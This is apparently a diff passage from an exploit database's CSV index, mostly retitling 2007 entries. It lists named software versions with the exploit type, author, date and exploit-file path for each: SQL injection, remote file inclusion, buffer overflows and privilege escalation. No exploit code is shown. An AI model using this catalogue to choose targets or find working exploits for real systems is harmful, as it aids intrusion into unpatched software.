Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0 +3076,platforms/php/webapps/3076.php,"Simple Web Content Management System SQL Injection Exploit",2007-01-03,DarkFig,php,webapps,0 +3077,platforms/osx/remote/3077.rb,"Apple Quicktime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 +3078,platforms/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 HTTP Sniffer Component Remote DoS",2007-01-04,nitr0us,windows,dos,0 +3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast (XML title) Remote Format String PoC",2007-01-04,MoAB,osx,dos,0 -3081,platforms/asp/webapps/3081.pl,"DigiRez <= 3.4 - (book_id) Remote SQL Injection Exploit",2007-01-04,ajann,asp,webapps,0 -3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id variable) Remote SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 +3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection Exploit",2007-01-04,ajann,asp,webapps,0 +3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id variable) SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - (eval/SQL Injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 -3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin <= 7.0.x - (acroreader) XSS",2007-01-05,"Stefano Di Paola",windows,remote,0 -3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery <= 1.4.10 - Remote SQL Injection Exploit",2007-01-05,DarkFig,php,webapps,0 +3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) XSS",2007-01-05,"Stefano Di Paola",windows,remote,0 +3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection Exploit",2007-01-05,DarkFig,php,webapps,0 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve (tapeeng.exe) Remote Buffer Overflow Exploit",2007-01-05,"Winny Thomas",windows,remote,6502 3087,platforms/osx/local/3087.rb,"Mac OS X 10.4.8 - DiskManagement BOM Local Privilege Escalation Exploit",2007-01-05,MoAB,osx,local,0 3088,platforms/osx/local/3088.rb,"Mac OS X 10.4.8 - DiskManagement BOM (cron) Privilege Escalation Exploit",2007-01-05,MoAB,osx,local,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 -3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Include Vulnerabilities",2007-01-06,"Mehmet Ince",php,webapps,0 -3091,platforms/php/webapps/3091.php,"L2J Statistik Script <= 0.09 - (index.php page) Local File Include Exploit",2007-01-07,Codebreak,php,webapps,0 +3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion Vulnerabilities",2007-01-06,"Mehmet Ince",php,webapps,0 +3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - (index.php page) Local File Inclusion Exploit",2007-01-07,Codebreak,php,webapps,0 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80 -3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 - (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0 +3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit",2007-01-07,"Critical Security",bsd,local,0 -3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 -3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 - (index.php) Remote File Include",2007-01-07,GoLd_M,php,webapps,0 +3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 +3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - (index.php) Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - (index.php) Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0 -3099,platforms/linux/remote/3099.pm,"Berlios GPSD <= 2.7 - Remote Format String Exploit (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 +3099,platforms/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String Exploit (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Include",2007-01-08,k1tk4t,php,webapps,0 -3101,platforms/multiple/dos/3101.py,"Opera <= 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 +3101,platforms/multiple/dos/3101.py,"Opera 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3102,platforms/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Local Privilege Escalation Exploit",2007-01-08,MoAB,osx,local,0 -3103,platforms/php/webapps/3103.php,"@lex Guestbook <= 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 -3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Include Vulnerabilities",2007-01-09,IbnuSina,php,webapps,0 -3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate <= 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 -3106,platforms/php/webapps/3106.txt,"uniForum <= 4 - (wbsearch.aspx) Remote SQL Injection",2007-01-09,ajann,php,webapps,0 -3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server <= 1.01 - (LIST) Remote BoF Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 -3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Include Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 -3109,platforms/php/webapps/3109.php,"WordPress <= 2.0.6 - wp-trackback.php Remote SQL Injection Exploit",2007-01-10,rgod,php,webapps,0 +3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 +3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion Vulnerabilities",2007-01-09,IbnuSina,php,webapps,0 +3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 +3106,platforms/php/webapps/3106.txt,"uniForum 4 - (wbsearch.aspx) SQL Injection",2007-01-09,ajann,php,webapps,0 +3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - (LIST) Remote BoF Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 +3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 +3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - wp-trackback.php SQL Injection Exploit",2007-01-10,rgod,php,webapps,0 3110,platforms/osx/dos/3110.rb,"Mac OS X 10.4.8 Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect DoS Exploit",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 -3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Include",2007-01-10,irvian,php,webapps,0 -3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Include Vulnerabilities",2007-01-11,3l3ctric-Cracker,php,webapps,0 +3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0 +3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion Vulnerabilities",2007-01-11,3l3ctric-Cracker,php,webapps,0 3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL/XSS) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0 -3116,platforms/php/webapps/3116.php,"sNews <= 1.5.30 - Remote Reset Admin Pass / Command Exec Exploit",2007-01-12,rgod,php,webapps,0 -3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Include",2007-01-12,"ilker Kandemir",php,webapps,0 -3118,platforms/php/webapps/3118.txt,"TLM CMS <= 1.1 - (i-accueil.php chemin) Remote File Include",2007-01-12,GoLd_M,php,webapps,0 +3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Exec Exploit",2007-01-12,rgod,php,webapps,0 +3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 +3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3119,platforms/windows/dos/3119.py,"VLC Media Player 0.8.6a Unspecified Denial of Service Exploit",2007-01-12,shinnai,windows,dos,0 -3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) Remote SQL Injection",2007-01-12,chernobiLe,php,webapps,0 -3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer <= 2.0 - (common.php) Remote Inclusion",2007-01-12,GoLd_M,php,webapps,0 -3122,platforms/asp/webapps/3122.pl,"DigiAffiliate <= 1.4 - (visu_user.asp id) Remote SQL Injection Exploit",2007-01-13,ajann,asp,webapps,0 -3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre <= 2.01 - (path) Remote File Include Exploit",2007-01-13,ajann,php,webapps,0 -3124,platforms/php/webapps/3124.php,"ThWboard <= 3.0b2.84-php5 SQL Injection / Code Execution Exploit",2007-01-14,rgod,php,webapps,0 +3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) SQL Injection",2007-01-12,chernobiLe,php,webapps,0 +3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - (common.php) Remote Inclusion",2007-01-12,GoLd_M,php,webapps,0 +3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection Exploit",2007-01-13,ajann,asp,webapps,0 +3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion Exploit",2007-01-13,ajann,php,webapps,0 +3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 SQL Injection / Code Execution Exploit",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - (download.php) Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 -3126,platforms/windows/dos/3126.c,"WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit",2007-01-14,Marsu,windows,dos,0 +3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 SITE ADMN Remote Denial of Service Exploit",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP (USER) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 3130,platforms/osx/dos/3130.c,"Mac OS X 10.4.8 AppleTalk ATPsndrsp() Heap Buffer Overflow PoC",2007-01-14,MoAB,osx,dos,0 3131,platforms/windows/local/3131.c,"Kaspersky Antivirus 6.0 - Local Privilege Escalation Exploit",2007-01-15,MaD,windows,local,0 3132,platforms/windows/remote/3132.pl,"TFTPDWIN 0.4.2 - Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,69 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143 -3134,platforms/php/webapps/3134.php,"KGB <= 1.9 - (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0 -3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 +3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion Exploit",2007-01-15,Kacper,php,webapps,0 +3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service Exploit",2003-07-07,anonymous,windows,dos,0 -3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 - (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0 +3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 -3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id variable) Remote SQL Injection Exploit",2007-01-17,SlimTim10,php,webapps,0 +3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id variable) SQL Injection Exploit",2007-01-17,SlimTim10,php,webapps,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Exploit",2007-01-17,shinnai,windows,dos,0 -3143,platforms/php/webapps/3143.php,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (1)",2007-01-17,"silent vapor",php,webapps,0 -3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (2)",2007-01-17,trew,php,webapps,0 -3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include",2007-01-17,v1per-haCker,php,webapps,0 -3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0 -3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (frontpage.php) Remote File Include",2007-01-17,GoLd_M,php,webapps,0 +3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (1)",2007-01-17,"silent vapor",php,webapps,0 +3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (2)",2007-01-17,trew,php,webapps,0 +3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 +3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0 +3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (frontpage.php) Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0 3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0 -3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 - (lang/index.php) Remote Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 +3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0 -3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Include",2007-01-18,GoLd_M,php,webapps,0 -3153,platforms/php/webapps/3153.php,"phpBP <= RC3 - (2.204) (SQL/cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 -3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs <= 0.70.0 - Local Buffer Overflow Exploit",2007-01-18,prdelka,linux,local,0 +3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 +3153,platforms/php/webapps/3153.php,"phpBP RC3 - (2.204) (SQL/cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 +3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow Exploit",2007-01-18,prdelka,linux,local,0 3155,platforms/windows/dos/3155.html,"BrowseDialog Class (ccrpbds6.dll) Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 3156,platforms/osx/local/3156.rb,"Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST PoC Exploit",2007-01-19,MoAB,osx,local,0 3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - (DivXBrowserPlugin npdivx32.dll) IE DoS",2007-01-19,shinnai,windows,dos,0 3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC",2007-01-19,oveRet,windows,remote,0 3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - (.HPJ) Buffer Overflow Exploit",2007-01-19,porkythepig,windows,local,0 -3160,platforms/osx/dos/3160.html,"Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC",2007-01-20,MoAB,osx,dos,0 -3161,platforms/php/webapps/3161.txt,"PhpSherpa (include/config.inc.php) Remote File Include",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3162,platforms/php/webapps/3162.txt,"Bradabra <= 2.0.5 - (include/includes.php) Remote Inclusion",2007-01-20,GoLd_M,php,webapps,0 -3163,platforms/php/webapps/3163.txt,"Neon Labs Website <= 3.2 - (nl.php g_strRootDir) Remote Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3164,platforms/php/webapps/3164.pl,"phpIndexPage <= 1.0.1 - (config.php) Remote Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 -3165,platforms/php/webapps/3165.txt,"MySpeach <= 2.1b (up.php) Remote Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3160,platforms/osx/dos/3160.html,"Transmit.app 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC",2007-01-20,MoAB,osx,dos,0 +3161,platforms/php/webapps/3161.txt,"PhpSherpa (include/config.inc.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - (include/includes.php) Remote Inclusion",2007-01-20,GoLd_M,php,webapps,0 +3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - (nl.php g_strRootDir) Remote Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3164,platforms/php/webapps/3164.pl,"phpIndexPage 1.0.1 - (config.php) Remote Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 +3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b (up.php) Remote Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - aim:// URL Handler Format String Exploit PoC",2007-01-21,MoAB,osx,dos,0 3167,platforms/osx/dos/3167.c,"Mac OS X 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3168,platforms/windows/remote/3168.java,"Sun Microsystems Java GIF File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 -3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Include",2007-01-21,v1per-haCker,php,webapps,0 -3170,platforms/windows/remote/3170.pm,"3Com TFTP Service <= 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2007-01-21,Enseirb,windows,remote,69 -3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Include Exploit",2007-01-21,DeltahackingTEAM,php,webapps,0 +3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 +3170,platforms/windows/remote/3170.pm,"3Com TFTP Service 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2007-01-21,Enseirb,windows,remote,69 +3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Inclusion Exploit",2007-01-21,DeltahackingTEAM,php,webapps,0 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - (gallery.php) Remote Blind SQL Injection Exploit",2007-01-21,r00t,php,webapps,0 3173,platforms/osx/local/3173.rb,"Mac OS X 10.4.8 - System Preferences Local Privilege Escalation Exploit",2007-01-21,MoAB,osx,local,0 3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 -3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 functions.visohotlink.php Remote File Include Exploit",2007-01-22,bd0rk,php,webapps,0 +3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 functions.visohotlink.php Remote File Inclusion Exploit",2007-01-22,bd0rk,php,webapps,0 3176,platforms/windows/local/3176.cpp,"Microsoft Visual C++ (.RC Resource Files) Local Buffer Overflow Exploit",2007-01-22,porkythepig,windows,local,0 3177,platforms/multiple/local/3177.txt,"Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3178,platforms/multiple/local/3178.txt,"Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0 @@ -2854,244 +2854,244 @@ id,file,description,date,author,platform,type,port 3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 - (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) DoS Exploit",2007-01-23,shinnai,windows,dos,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 -3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 +3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 -3186,platforms/asp/webapps/3186.txt,"ASP EDGE <= 1.2b (user.asp) Remote SQL Injection",2007-01-24,ajann,asp,webapps,0 -3187,platforms/asp/webapps/3187.txt,"ASP NEWS <= 3.0 - (news_detail.asp) Remote SQL Injection",2007-01-24,ajann,asp,webapps,0 +3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b (user.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0 +3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - (news_detail.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0 3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0 3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 -3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0 +3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Inclusion Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 -3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection",2007-01-25,ajann,asp,webapps,0 -3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - (print.asp) Remote SQL Injection",2007-01-25,ajann,asp,webapps,0 +3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps,0 +3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - (print.asp) SQL Injection",2007-01-25,ajann,asp,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0 -3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - (vp/configure.php) Remote File Include",2007-01-25,GoLd_M,php,webapps,0 +3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - (vp/configure.php) Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby)",2007-01-25,MoAB,osx,dos,0 -3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - (package.php) Remote File Include",2007-01-26,"Cold Zero",php,webapps,0 -3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include",2007-01-26,"ThE dE@Th",php,webapps,0 -3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 - (download.php) Remote File Disclosure",2007-01-26,ajann,php,webapps,0 +3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - (package.php) Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0 +3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 +3203,platforms/php/webapps/3203.txt,"FdScript 1.3.2 - (download.php) Remote File Disclosure",2007-01-26,ajann,php,webapps,0 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow PoC",2007-01-26,"Andres Tarasco",windows,dos,0 3205,platforms/php/webapps/3205.txt,"nsGalPHP - (includes/config.inc.php racineTBS) Remote Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 -3206,platforms/php/webapps/3206.txt,"ACGVclick <= 0.2.0 - (path) Remote File Include",2007-01-27,ajann,php,webapps,0 -3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Include Exploit",2007-01-27,MackRulZ,php,webapps,0 -3208,platforms/php/webapps/3208.txt,"ACGVannu <= 1.3 - (index2.php) Remote User Pass Change",2007-01-27,ajann,php,webapps,0 -3209,platforms/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Include (RFI)",2007-01-27,"ThE dE@Th",php,webapps,0 -3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - (default.asp) Remote SQL Injection",2007-01-27,ajann,asp,webapps,0 +3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - (path) Remote File Inclusion",2007-01-27,ajann,php,webapps,0 +3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion Exploit",2007-01-27,MackRulZ,php,webapps,0 +3208,platforms/php/webapps/3208.txt,"ACGVannu 1.3 - (index2.php) Remote User Pass Change",2007-01-27,ajann,php,webapps,0 +3209,platforms/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion",2007-01-27,"ThE dE@Th",php,webapps,0 +3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - (default.asp) SQL Injection",2007-01-27,ajann,asp,webapps,0 